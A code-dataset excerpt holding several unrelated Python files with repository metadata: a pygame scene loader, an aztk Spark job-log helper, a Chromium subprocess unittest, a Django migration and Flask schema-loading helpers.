2b25d6c6a75c1b4e1c3f8966eece8260ed764f29
| 3,300
|
py
|
Python
|
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | 1
|
2021-10-05T11:45:28.000Z
|
2021-10-05T11:45:28.000Z
|
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | null | null | null |
04.adventure/17.ui_panel_reactif/scene.py
|
Gaetz/python-training
|
542f658883c66aaa932fb9e385225cfd573bb6de
|
[
"MIT"
] | null | null | null |
import os
import pygame
from sprite_controlled import SpriteControlled
from sprite import Sprite
from warp import Warp
from ui_panel import UiPanel
class Scene:
    # Resolve scene files relative to this script rather than a machine-specific absolute path.
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), '')
def __init__(self, filename):
self.filename = filename
self.load(filename)
def load(self, filename):
        with open(Scene.path + filename) as file:
            data = file.read().splitlines()
ground_height = 0
self.cursor = Sprite(0, 0, 'cursor.png', False)
self.sprites = []
self.warps = []
self.panel = UiPanel(0, 0, 800, 100)
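        # Each line of the scene file is expected to be a semicolon-separated
        # record: a type (ground, background, player, sprite or warp), an
        # image name and, depending on the type, an x position, a height
        # (a number or the keyword "ground") and an extra field (presumably
        # the movement speed for the player, the warp target for warps).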
for line in data:
cell = line.split(";")
# Ground
if(cell[0] == "ground"):
self.ground = Sprite(0, 0, cell[1]+".png", False)
_, screen_h = pygame.display.get_surface().get_size()
ground_height = screen_h - self.ground.surface.get_height()
self.ground.y = ground_height
# Background
elif(cell[0] == "background"):
self.background = Sprite(0, 0, cell[1]+".png", False)
# Player
elif(cell[0] == "player"):
height = 0
if cell[3] == "ground":
height = -1
self.player = SpriteControlled(int(cell[2]), height, cell[1]+".png", True, int(cell[4]))
# Sprites
elif(cell[0] == "sprite"):
height = 0
if cell[3] == "ground":
height = -1
sprite = Sprite(int(cell[2]), height, cell[1]+".png", True)
self.sprites.append(sprite)
# Warps
elif(cell[0] == "warp"):
height = 0
if cell[3] == "ground":
height = -1
warp = Warp(int(cell[2]), height, cell[1]+".png", False, eval(cell[4]))
self.warps.append(warp)
# Set heights
if(self.player.y == -1):
self.player.y = ground_height
for s in self.sprites:
if(s.y == -1):
s.y = ground_height
for w in self.warps:
if(w.y == -1):
w.y = ground_height - w.surface.get_height() / 2
def inputs(self, events):
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
mouse_click = pygame.mouse.get_pos()
self.player.move_to(mouse_click[0])
if event.type == pygame.KEYDOWN:
keys = pygame.key.get_pressed()
if keys[pygame.K_F5]:
self.load(self.filename)
def update(self, change_scene):
self.cursor.set_position(pygame.mouse.get_pos())
self.player.update()
for w in self.warps:
if(self.player.intersects(w)):
change_scene(w.to_scene, w.to_scene_x)
self.panel.update()
def draw(self, screen):
self.background.draw(screen)
self.ground.draw(screen)
for w in self.warps:
w.draw(screen)
for s in self.sprites:
s.draw(screen)
self.player.draw(screen)
self.panel.draw(screen)
self.cursor.draw(screen)
| 33.333333
| 104
| 0.507576
|
a6f7b895afa00a413b36794dccc08a03cc8328c5
| 2,009
|
py
|
Python
|
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
aztk/spark/client/job/helpers/get_application_log.py
|
atg-abhishek/aztk
|
e3d060e58373c316fddbc0907f08b1430e1b2691
|
[
"MIT"
] | null | null | null |
import azure.batch.models as batch_models
import azure.batch.models.batch_error as batch_error
from aztk import error
from aztk.spark import models
from aztk.utils import helpers
from .get_recent_job import get_recent_job
def _get_application_log(core_job_operations, spark_job_operations, job_id, application_name):
# TODO: change where the logs are uploaded so they aren't overwritten on scheduled runs
# current: job_id, application_name/output.log
# new: job_id, recent_run_job.id/application_name/output.log
recent_run_job = get_recent_job(core_job_operations, job_id)
try:
task = core_job_operations.batch_client.task.get(job_id=recent_run_job.id, task_id=application_name)
except batch_models.batch_error.BatchErrorException as e:
# see if the application is written to metadata of pool
applications = spark_job_operations.list_applications(job_id)
for application in applications:
if applications[application] is None and application == application_name:
raise error.AztkError("The application {0} has not yet been created.".format(application))
raise error.AztkError("The application {0} does not exist".format(application_name))
else:
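        # The task lookup succeeded, so the application exists; its log is
        # only returned below once the task has finished running.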
if task.state in (
batch_models.TaskState.active,
batch_models.TaskState.running,
batch_models.TaskState.preparing,
):
raise error.AztkError("The application {0} has not yet finished executing.".format(application_name))
return core_job_operations.get_application_log(job_id, application_name)
def get_job_application_log(core_job_operations, spark_job_operations, job_id, application_name):
try:
return models.ApplicationLog(
_get_application_log(core_job_operations, spark_job_operations, job_id, application_name))
except batch_error.BatchErrorException as e:
raise error.AztkError(helpers.format_batch_exception(e))
| 46.72093
| 113
| 0.740667
|
65fe6abc5430330438a2a7f3c6edd5953879ed8c
| 46
|
py
|
Python
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 18
|
2020-11-26T08:31:27.000Z
|
2022-03-28T07:35:41.000Z
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 82
|
2020-12-25T08:26:27.000Z
|
2022-03-25T06:11:36.000Z
|
refactorings/__init__.py
|
Amin-MAG/CodART
|
a964a506d031f6eea505df081b9ba946f490d021
|
[
"MIT"
] | 59
|
2020-11-26T08:31:42.000Z
|
2022-02-04T11:09:03.000Z
|
# from refactorings import collapse_hierarchy
| 23
| 45
| 0.869565
|
1cb89ad30caffc8b395fbf467e19582cbf2bd775
| 644
|
py
|
Python
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 14,668
|
2015-01-01T01:57:10.000Z
|
2022-03-31T23:33:32.000Z
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 86
|
2015-10-21T13:02:42.000Z
|
2022-03-14T07:50:50.000Z
|
testing/scripts/rust/exe_util_unittests.py
|
chromium/chromium
|
df46e572c3449a4b108d6e02fbe4f6d24cf98381
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5,941
|
2015-01-02T11:32:21.000Z
|
2022-03-31T16:35:46.000Z
|
#!/usr/bin/env vpython3
# Copyright 2021 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import argparse
import json
import os
from pyfakefs import fake_filesystem_unittest
import sys
import tempfile
import unittest
import exe_util
class ExeUtilTests(fake_filesystem_unittest.TestCase):
def test_run_and_tee_output(self):
# Test wrapping Python as it echos a '.' character back.
args = [sys.executable, '-c', 'print(\'.\')']
output = exe_util.run_and_tee_output(args)
self.assertEqual('.', output.strip())
| 26.833333
| 72
| 0.732919
|
21b1fb6c015ae3edebc36006c0e1067abd2a9a14
| 575
|
py
|
Python
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2020-12-17T13:50:42.000Z
|
2021-01-09T07:01:07.000Z
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 2
|
2021-08-25T05:02:56.000Z
|
2022-01-16T18:29:49.000Z
|
core/migrations/0017_auto_20210119_1217.py
|
Nephrolog-lt/nephrolog-api
|
ccd2162aff02b2abfab0f285779e5d8457be1788
|
[
"Apache-2.0"
] | 1
|
2020-11-16T01:40:15.000Z
|
2020-11-16T01:40:15.000Z
|
# Generated by Django 3.1.5 on 2021-01-19 12:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0016_auto_20210119_0848'),
]
operations = [
migrations.AlterField(
model_name='product',
name='name_lt',
field=models.CharField(max_length=128, unique=True),
),
migrations.AlterField(
model_name='product',
name='name_search_lt',
field=models.CharField(max_length=128, unique=True),
),
]
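# To apply this schema change (standard Django workflow, assumed here):
#     python manage.py migrate core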
| 23.958333
| 64
| 0.589565
|
54a9b93ba1e6ab4f62d6ef94b5e504c220eda5d7
| 622
|
py
|
Python
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | 1
|
2021-11-21T13:52:36.000Z
|
2021-11-21T13:52:36.000Z
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | 3
|
2021-10-06T13:23:43.000Z
|
2022-01-07T13:48:41.000Z
|
services/python-images/src/master/helpers/io.py
|
hpi-epic/mpcsl
|
05361acb0c8da68ddfa21f9fc9cd32a59255dc5c
|
[
"MIT"
] | null | null | null |
from flask import request
from werkzeug.exceptions import BadRequest
class InvalidInputData(BadRequest):
def __init__(self, message='Invalid input data.', payload=None):
self.payload = payload
BadRequest.__init__(self, description=payload or message)
def load_data(schema, location='json', *args, **kwargs):
vals = getattr(request, location, None)
data, errors = schema().load(vals, *args, **kwargs)
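    # Relies on the marshmallow 2.x API, where load() returns a
    # (data, errors) pair; marshmallow 3 raises ValidationError instead.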
if len(errors) > 0:
raise InvalidInputData(payload=errors)
return data
def marshal(schema, object, *args, **kwargs):
return schema().dump(object, *args, **kwargs).data
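# A minimal usage sketch for the helpers above. "ItemSchema" and the "/items"
# route are hypothetical, assuming a Flask app and a marshmallow 2.x schema
# wired to load_data/marshal.
from flask import Flask, jsonify
from marshmallow import Schema, fields

app = Flask(__name__)


class ItemSchema(Schema):
    name = fields.Str(required=True)
    quantity = fields.Int(missing=1)


@app.route('/items', methods=['POST'])
def create_item():
    # load_data validates request.json against the schema and raises
    # InvalidInputData (a 400) when there are validation errors.
    data = load_data(ItemSchema)
    item = dict(data)  # stand-in for actually persisting the item
    return jsonify(marshal(ItemSchema, item)), 201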
| 29.619048
| 68
| 0.699357
|